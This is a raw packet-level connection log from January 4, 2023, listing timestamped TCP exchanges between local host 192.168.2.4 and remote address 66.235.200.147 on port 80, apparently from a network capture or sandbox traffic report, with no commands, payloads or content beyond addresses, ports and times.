Jan 4, 2023 16:47:38.876355886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876355886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876396894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876410961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876437902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876466990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876477957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876519918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876558065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876571894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876571894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876600027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876610041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876610041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876640081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876679897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876679897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876709938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876727104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876756907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876769066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876786947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876810074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876827955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876851082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876863003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876892090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876904011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876931906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876971006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876988888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876988888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877012014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877022982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877053022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877063990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877091885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877106905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877131939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877146006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877171040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877187014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877211094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877228022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877252102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877279997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877319098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877357960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877405882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877412081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877412081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877444029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877445936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877464056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877487898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877507925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877527952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.877547979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.877592087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897154093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897193909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897223949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897253036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897281885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897310019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897337914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897366047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897392988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897406101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897406101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897406101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897420883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897449970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897479057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897480965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897480965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897506952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897507906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897522926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897536039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897551060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897563934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897587061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897593021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897607088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897622108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897650003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897654057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897677898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897686958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897705078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897706985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897723913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897736073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897756100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897764921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897783995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897795916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897818089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897825956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897849083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897855997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897885084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897896051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897913933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897922039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897942066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897943020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897959948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.897972107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.897994995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898000002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898017883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898030043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898051023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898060083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898087978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898089886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898117065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898138046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898138046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898144960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898161888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898178101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898205042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898209095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898226976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898236036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898266077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898277044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898277044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898294926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898310900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898323059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898341894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898350954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898379087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898386955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898399115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898407936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898427010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898436069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898452997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898463964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898495913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898530006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898549080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898549080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898571968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898574114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898574114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898602009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898627996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898632050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898641109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898669004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898679018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898713112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898729086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898766994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898802996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898832083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898832083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898838043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898873091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898878098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898885965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898910046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898926020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898941040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898957014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898969889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.898983955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.898997068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899010897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899025917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899043083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899054050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899070024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899084091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899097919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899115086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899141073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899143934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899169922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899173975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899183989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899204969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899230003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899233103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899251938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899261951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899276972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899291039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899302959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899322033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899346113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899349928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899374008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899382114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899389029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899415970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899429083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899451971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899461031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899488926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899493933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899524927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899548054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899559021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899580002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899595976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899605989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899636030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899657011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899673939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899713039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899730921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899753094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899754047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899775028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899790049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899821997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899826050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899841070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899861097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899876118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899893045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899910927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899928093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899941921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899960995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.899979115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.899995089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900011063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900032043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900047064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900064945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900079966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900099039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900111914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900132895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900147915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900198936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900206089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900254011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900269032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900300026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900316954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900346994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900353909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900393009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900424957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900446892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900456905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900505066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900525093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900563002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900580883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900620937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900629997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900676012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900676966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900732994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900744915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900784016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900823116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900835037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900840044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900886059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900919914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900928974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900935888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.900976896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.900986910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901025057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901042938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901073933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901086092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901122093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901137114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901168108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901204109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901216984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901233912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901268959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901278973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901315928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901324034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901362896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901379108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901417017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901432037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901473999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901488066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901530981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901540995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901590109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901592016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901650906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901684999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901706934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901711941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901756048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901777983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901807070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901820898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901856899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901866913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901904106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901910067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901947975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.901963949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.901998043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902018070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902045965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902057886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902095079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902102947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902143002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902151108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902194023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902205944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902240992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902252913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902288914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902298927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902342081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902355909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902393103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902415991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902451038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902476072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902503014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902507067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902548075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902559042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902595043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902607918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902642012 CET	80	49696	66.235.200.147	192.168.2.4
